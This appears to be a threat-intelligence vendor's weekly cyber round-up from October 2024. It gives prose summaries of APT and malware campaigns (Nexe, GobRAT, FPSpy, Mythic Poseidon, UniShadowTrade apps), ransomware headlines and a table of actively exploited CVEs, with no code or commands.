Request demo

Best practices guide: How to build a requirements-driven intelligence programme

Download Report

Weekly Cyber Round-up

Intelligence Report

October 3, 2024

Patchwork APT targets Chinese entities with Nexe backdoor

Cyble researchers identified an ongoing campaign by the Patchwork advanced persistent threat (APT) actor, likely aimed at Chinese entities, that delivers a new backdoor, dubbed Nexe. As an initial infection vector, the threat actor utilises a malicious LNK file that is likely delivered via phishing emails. The file executes a PowerShell script responsible for downloading two files, including a PDF lure and a malicious DLL. The campaign uses DLL sideloading techniques to execute the downloaded DLL, which is responsible for decrypting and executing shellcode that both modifies the AMSIscanBuffer and ETWEventWrite APIs, and delivers Nexe. The modification is aimed at evading detection mechanisms, enabling the malware to stealthily operate. Nexe is responsible for collecting system information such as the Process ID, public and private IP addresses, usernames, and more.

Get the alert delivered directly to your inbox

Bulbature and GobRAT used to turn compromised edge devices into ORBs

Since mid-2023, Sekoia researchers have investigated an infrastructure which consists of edge devices compromised by GobRAT and Bulbature malware. The attackers run Bash scripts that download the malware from deployed staging servers, ultimately transforming targeted devices into Operational Relay Boxes (ORBs) that can launch further attacks. The infrastructure consists of over 75,000 compromised hosts in a total of 139 countries, with the United States, Hong Kong, and Sweden being the most impacted. GobRAT is a remote access trojan (RAT) that is written in Go and provides 22 types of commands enabling reverse shell operations, distributed denial-of-service attacks, reading and writing files, and more. Bulbature is an implant that is leveraged to transform targeted edge devices into an ORB and relay attacks against final target networks. Bulbature’s behaviour is considered more complex than GobRAT. The infrastructure is believed to be used by several threat actors originating from China.

Sparkling Pisces uses KLogEXE and FPSpy to target South Korea and Japan

Palo Alto Networks Unit 42 researchers discovered two previously undocumented malware, dubbed KLogEXE and FPSpy, used by the North Korean threat actor, Sparkling Pisces. KLogEXE is a keylogger written in C++ and collects information on currently running applications, engages in keylogging, and monitors mouse clicks. FPSpy is a backdoor capable of keylogging, as well as storing configuration and system information, downloading and executing additional encrypted modules, and more. Based on code and behavioural similarities, FPSpy appears to be a variant of a malware used in a campaign detailed by ASEC researchers in 2022. The malware also shares characteristics with the KGHSpy backdoor discovered in 2020. Code similarity was also observed between KLogEXE and FPSpyMost of the observed targets originated from South Korea and Japan.

Transparent Tribe targets India in campaign using Mythic Poseidon binaries

CYFIRMA researchers observed an ongoing campaign, attributed to Transparent Tribe, that is currently targeting India. The researchers identified 15 servers hosting Mythic C2 infrastructure that is associated with ongoing attacks utilising customised payloads, such as Mythic Poseidon binaries. As an initial access vector, Transparent Tribe distributes malicious Linux desktop entry files disguised as PDFs, with the files ultimately used to run malicious binaries that establish persistent access and help evade detection. Transparent Tribe is believed to be increasingly targeting Linux environments due to their widespread use in Indian government sectors. In particular, the Debian-based BOSS OS is used across various ministries and defence forces.

Fake Android and iOS mobile trading apps distributed in pig butchering scheme

Since May 2024, Group-IB researchers identified multiple fake Android and iOS apps, collectively classified under the UniShadowTrade malware family, that are disguised as trading or cryptocurrency platforms used in pig butchering schemes. Victims are typically lured through dating apps or social networks, with the attackers using social engineering to gain their trust. The apps were developed with the UniApp cross-platform framework and initially distributed via the Google Play and Apple App stores. The attackers began distributing the apps through phishing websites after they were removed from the official storesOnce installed, users are instructed to trust the Enterprise developer profile, register with the app, and follow a set of investment instructions that result in the theft of their funds. The fake apps support English, Portuguese, Chinese, and Hindi, and have targeted victims in the Asia-Pacific, Europe, the Middle East, and Africa.

Ransomware

Volume of blog posts by operators during the last week.

Security Brief: Royal Mail Lures Deliver Open Source Prince RansomwareProofpoint US Blog – Oct 02 2024Is MEOW Ransomware Getting Its Claws Out?Cyberint – Oct 02 2024Key Group: another ransomware group using leaked buildersITSecurityNews.info – Oct 01 2024LockBit power cut: four new arrests and financial sanctions against affiliates Europol – Publications & Documents – Oct 01 2024JPCERT shares Windows Event Log tips to detect ransomware attacksBleeping Computer – Sep 30 2024Storm-0501: Ransomware attacks expanding to hybrid cloud environmentsMicrosoft Security Blog – Sep 26 2024

High Priority Vulnerabilities

Name Software Base
Score
Temp
Score
CVE-2024-29824 Endpoint Manager 7.3 7.0
Related: Critical Ivanti RCE flaw with public exploit now used in attacks
CVE-2023-25280 DIR820LA1 9.8 5.3
Related: SAP, D-Link flaws among 4 added to Known Exploited Vulnerabilities catalog
CVE-2024-34102 Magento 9.8 9.4
Related: CosmicSting flaw exploited to hack 5% of all Adobe Commerce and Magento stores
CVE-2017-10271 WebLogic Server 9.8 9.4
Related: Hadooken and K4Spreader: The 8220 Gang’s Latest Arsenal
CVE-2024-27956 Automatic Plugin 9.9 7.1
Related: Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan

Get the full report
delivered to your inbox​

By filling out and submitting this request you give us your consent to use and store the information  you have provided for the purpose set out above or in connection with it. For more information, see our Privacy Policy.

Detect and respond to threats faster.

Request a personalised demo to see Silobreaker in action.
Get started

Request a demo